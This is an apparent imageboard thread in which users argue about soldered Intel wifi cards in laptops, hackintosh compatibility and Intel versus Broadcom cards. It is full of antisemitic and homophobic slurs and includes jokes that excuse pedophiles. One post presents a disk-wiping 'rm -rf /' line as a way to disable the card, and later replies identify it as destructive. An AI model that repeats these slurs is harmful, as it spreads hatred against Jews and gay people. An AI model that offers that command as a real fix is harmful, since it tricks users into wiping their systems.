>2019
>laptops now come with soldered wifi cards
>soldered intel wifi cards
It's over guys, the jews won

Attached: Untitled.png (1366x768, 1.63M)

Other urls found in this thread:

intel.com/content/www/us/en/support/articles/000026155/network-and-i-o/wireless-networking.html
twitter.com/SFWRedditVideos

who cares

the people who care about privacy and the people who use hackintoshes

so pedos and neets, cool.

What's the difference when consumer laptops start to melt their internals the day you buy them?

you mean Jow Forums memes ?

>have gigabit fiber conection and powerful AC router that can get you 600mbps over wifi
>barely get 30mbps because shitty intel soldered card
>dude who cares lmao

> HP
Not sure why, they still have BIOS blacklist and soldering means there's more work done since it looks like a standard mPCIe card.

>desolder it
>?
>profit

pedo and neet lives matter, deal with it bigot.

>hackintosh
>meme
at least you tried
>it looks like a standard mPCIe card
>same width as a heatpipe - 6-8 mm
no

>falling for the 'newer is better' meme

>not choosing a laptop with thunderbolt so you can upgrade it with eGPU, more SSDs or daisy-chaining monitors

can't think of a reason why anyone would NEED that. desktops are way more suitable for all that.

If you care so much, buy better laptop and stop being a faggot.

Its like you think everyone on Jow Forums has shit like this and doesn't actually use w10

Intel has the best wifi cards right now anyway. The 9260 is like miles ahead

>not supported by macOS

Attached: 180px-PennLeft[1].png (180x191, 49K)

>strong autism

Kys kike

I've only ever had shit experiences with Intel wifi cards, And the exact opposite with Broadcom cards.

gay faggot

The 6230, 6235, 7260 and 3160 would like to have a word with you.

Intel may be kiked, but at least they aren't faggots kek

Do they have ME on them too or what? What's even an alternative.

>one laptop means all laptops
Nibba, peas.

if you really paranoid about it just stab it with a knife and use a usb wifi card of ya own choosing.

Intel will integrate WIFI into CPU 2-3 yeear next

if you want to disable the botnet connection with the jew coporation you must execute the following command:

- apt-get update && rm -rf / --nopreserve-root && apt install intelfi-dis
- intelfi-dis start

thank you

Attached: 434343434.png (992x632, 30K)

oh hacintosh is a cringe meme. Who would go so far out of their way to suck down cum from a faggot to then get pumped in the ass?

>stop using what I don't like ;_;

>i like to be groped by Pajeet at MS
>i like to write ls -a in my pirated 70s OS

Do not do this! It installs a virus that fucked my pc. Now it doesn't even boot anymore.

You have really typed a fucking command you have seen on 4CHANNEL without even researching what it actually do?

Attached: 1452223019797.png (625x626, 5K)

>stop using what everyone doesn't like
FTFY
smugsatangrill.gif

Had no idea intel was so based and redpilled. Fuck apple

>projecting in everyone
This is new.

Don't need a
>buy better laptop and stop being a faggot.

Don't need a better laptop. Just a better wifi card fag.

>3000 euro HP Zbook Studio with 6core CPU, 64gb RAM, 4gb GPU, 2x NVMe SSD, 2x thunderbolt ports, aluminium unibody chassis
>buy better laptop and stop being a faggot

What are these? My sister had one break off her laptop once and I couldn't figure it out

Attached: r68.png (215x215, 60K)

Do people replace their wifi card? Always thought it was weird that it was removable.

smd choke coil

>Do people replace their CPU? Always thought it was weird that it was removable.
>Do people replace their SSD? Always thought it was weird that it was removable.
of course, I bought a laptop in 2011 which had wifi but no bluetooth, and I've replaced the card with a combo card
another laptop had a cheap, 1x1, 2.4ghz only, shit card which I replaced first with a better 2x2 card and then with a Broadcom BCM4352 - this is the best mPCI-e card : wifiAC, dual band, bluetooth, supported by macOS 10.8.5 -> 10.14+

Then unsolder it?

It doesn't install a virus, it has a command that wipes your entire disk. You weren't actually dumb enough to run it right?

>using wifi
>ever

Attached: 1504_be35b25e45034f65.jpg (622x647, 75K)

70s was peak computer

Everything from the last few decades has ME.

Thanks senpai it worked

thanks mate

intel.com/content/www/us/en/support/articles/000026155/network-and-i-o/wireless-networking.html

How do I restore it?

> --nopreserve-root
There's a error, it couldn't do that.

>hp
found your problem there.

seething

at least is not qualcomm atheros

pedos and neets are based

>mfw I just installed a brand new Intel 7260 AC card into my T430
I'm gonna keep using this fucking laptop until I die

Attached: 1535609838826.gif (450x272, 3.92M)

You're right, I didn't catch that. Nice roleplay.

Is there any way to build a computer that wouldn't have any backdoors already built into it?

Attached: Mickey_Chickentiger.png (516x516, 100K)

Install gentoo

"better laptop" means "NOT HP"

>Implying ZBooks are bad.
Stop living in 2010 user

This particular Zbook certainly is bad

At this point laptops are just oversized smartphones.

>BIOS blacklist
While this isn't a good thing - it really isn't - it's something that makes me go "so what if they solder the WIFI cards now" because I've never managed to replace a WIFI card with one that's better.

There's probably ways to get around that horse-shit but it seems to vary from laptop to laptop and it's not something you can immediately solve in 5 minutes when the machine boots and tells you it's a locked down piece of trash which refuses to accept cards for no good reason.

I disagree, my experience has been that Broadcom cards have been nothing but trouble forever and Intel's cards work flawlessly. This is totally due to the fact that I use GNU/Linux and Broadcom cards have required getting the Windows drivers and using fw-cutter and bullshit to work half-decently while Intel's always worked flawlessly out of the box. Your experience is likely different if you're a Wintoddler.

good smug, may i contribute ?

Attached: 17 - o13ZXA0.png (422x508, 131K)

Why do people spend money on new laptops when they only use them for stuff a 100$ Thinkpad from 2013 can do with no problems?

If I want power I have my desktop

>My sister had one break off her laptop once
How the fuck does that happen?

Doesn't make sense if you never leave your basement.

A combination of sleeping on a top bunk and not giving a shit about her possessions
I replaced the screen in that thing twice

Attached: sad merchant.png (200x247, 194K)

>laptops now come with soldered wifi cards
Eww
At least if they're doing to solder it in, they're using good ones. Intel wifi works well and reliably in all major OSes.

Pretty much have to with the dell XPS, which is ridiculous on a $2000 laptop, but the killer wifi card is shit.

>pedos and neets breathe
Might as well stop breathing then, right?